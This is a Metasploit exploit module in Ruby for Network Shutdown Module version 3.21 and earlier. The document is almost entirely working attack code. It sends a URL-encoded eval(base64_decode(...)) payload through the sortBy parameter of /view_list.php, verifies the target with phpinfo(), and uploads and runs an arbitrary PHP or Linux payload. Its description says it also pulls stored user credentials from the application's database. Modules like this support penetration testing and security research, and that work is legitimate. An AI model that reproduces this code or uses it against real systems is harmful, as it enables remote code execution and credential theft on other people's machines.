Network Shutdown Module 3.21 Remote PHP Code Injection

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
require 'msf/core/exploit/php_exe'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::PhpEXE  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection',  
'Description' => %q{  
This module exploits a vulnerability in lib/dbtools.inc which uses  
unsanitized user input inside a eval() call. Additionally the base64 encoded  
user credentials are extracted from the database of the application. Please  
note that in order to be able to steal credentials, the vulnerable service  
must have at least one USV module (an entry in the "nodes" table in mgedb.db)  
},  
'Author' =>  
[  
'h0ng10', # original discovery, msf module  
'sinn3r' # PhpEXE shizzle  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['OSVDB', '83199'],  
['URL', 'http://secunia.com/advisories/49103/']  
],  
'Payload' =>  
{  
'DisableNops' => true,  
'Space' => 4000  
},  
'Platform' => ['php', 'linux'],  
'Arch' => ARCH_PHP,  
  
'Targets' =>  
[  
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],  
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]  
],  
'DefaultTarget' => 0,  
'Privileged' => true,  
'DisclosureDate' => 'Jun 26 2012'  
))  
  
register_options(  
[  
Opt::RPORT(4679)  
], self.class)  
end  
  
def check  
# we use a call to phpinfo() for verification  
res = execute_php_code("phpinfo();die();")  
  
if not res or res.code != 200  
print_error("Failed: Error requesting page")  
return CheckCode::Unknown  
end  
  
return CheckCode::Vulnerable if (res.body =~ /This program makes use of the Zend/)  
return CheckCode::Safe  
end  
  
def execute_php_code(code, opts = {})  
param_name = rand_text_alpha(6)  
padding = rand_text_alpha(6)  
url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"  
  
res = send_request_cgi(  
{  
'uri' => '/view_list.php',  
'method' => 'POST',  
'vars_get' =>  
{  
'paneStatusListSortBy' => url_param,  
},  
'vars_post' =>  
{  
param_name => Rex::Text.encode_base64(code),  
},  
'headers' =>  
{  
'Connection' => 'Close',  
}  
})  
end  
  
def no_php_tags(p)  
p = p.gsub(/^<\?php /, '')  
p.gsub(/ \?\>$/, '')  
end  
  
def exploit  
print_status("#{rhost}:#{rport} - Sending payload")  
  
unlink = (target['Platform'] == 'linux') ? true : false  
p = no_php_tags(get_write_exec_payload(:unlink_self => unlink))  
  
execute_php_code(p)  
handler  
end  
end  
  
`